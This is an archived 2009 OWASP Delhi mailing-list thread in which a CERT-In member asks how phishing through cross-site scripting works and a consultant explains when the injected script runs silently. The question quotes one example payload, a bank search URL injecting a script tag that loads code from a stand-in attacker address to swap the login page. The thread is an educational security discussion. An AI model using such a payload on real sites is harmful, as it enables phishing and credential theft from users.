[Owasp-delhi] Phishing with XSS

Parmendra Sharma s.parmendra at gmail.com
Sat Feb 28 00:23:16 EST 2009


Hello Everyone

Thanks for your suggestions....Let me try the things that you people have
explained.

On Fri, Feb 27, 2009 at 5:15 PM, Karthik Muthukrishnan <
karthik.muthukrishnan at tcs.com> wrote:

> The result of this XSS attack depends on how the application processes ( or
> how vulnerable it is to ) the 'Search' parameter.
>
> On a successful XSS attack, the attack script in the search parameter must
> be embedded in the HTML of the search results page. In this case, the
> attack script will just run silently, like other scripts in <script> tags.
>
> The browser (behavior varies depending on MIME type) will prompt you with a
> save-as message box only when the XSS attack caused web application
> ('search' page) to download the remote file and send it to user. FF in my
> system just displays the script text. In IE7, after I click open, I am
> presented with a security warning about unknown publisher.
>
>
> Karthik Muthukrishnan
> Information Risk Management Consultant
> Tata Consultancy Services
> Mailto: karthik.muthukrishnan at tcs.com
> Website: http://www.tcs.com
> ____________________________________________
> Experience certainty.   IT Services
>                  Business Solutions
>                  Outsourcing
> ____________________________________________
>
>
>
>             Parmendra Sharma
>             <s.parmendra at gmai
>             l.com>                                                     To
>             Sent by:                  owasp-delhi at lists.owasp.org
>             owasp-delhi-bounc                                          cc
>             es at lists.owasp.or
>             g                                                     Subject
>                                       [Owasp-delhi] Phishing with XSS
>
>             02/25/2009 04:56
>             PM
>
>
>
>
>
>
>
> Hello OWASP Members,
>
> I have a doubt and here it is......
>
> In performing Phishing with XSS a script like "do.js "
>
> "http://www.attacked-bank.com/module.asp?search=<Script
> src=http://attacker-IP-address/do.js/ <http://attacker-ip-address/do.js/>
> >"
>
> can be used to change the original login page to the attackers choice
> without actually changing the URL.
>
> Now my question is that for performing the abovesaid case this script needs
> to be executed by the browser without the user's concent. In general
> scenerio while requesting for a script like this first a Pop up is given by
> the browser asking whether to run or to save the script.
>
> Please suggest.
>
>
>
> --
> Thanks and Regards:
>
> Parmendra Sharma
> Indian Computer Emergency Response Team (CERT-In)
> Ministry of Information Technology
> Government of India
> 6 C.G.O Complex
> Lodhi Road
> New Delhi_______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
> ForwardSourceID:NT000124A2
>
> =====-----=====-----=====
> Notice: The information contained in this e-mail
> message and/or attachments to it may contain
> confidential or privileged information. If you are
> not the intended recipient, any dissemination, use,
> review, distribution, printing or copying of the
> information contained in this e-mail message
> and/or attachments to it are strictly prohibited. If
> you have received this communication in error,
> please notify us by reply e-mail or telephone and
> immediately and permanently delete the message
> and any attachments. Thank you
>
>
>
>


-- 
Thanks and Regards:

Parmendra Sharma
Indian Computer Emergency Response Team (CERT-In)
Ministry of Information Technology
Government of India
6 C.G.O Complex
Lodhi Road
New Delhi
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090228/8b2204a0/attachment.html 


More information about the Owasp-delhi mailing list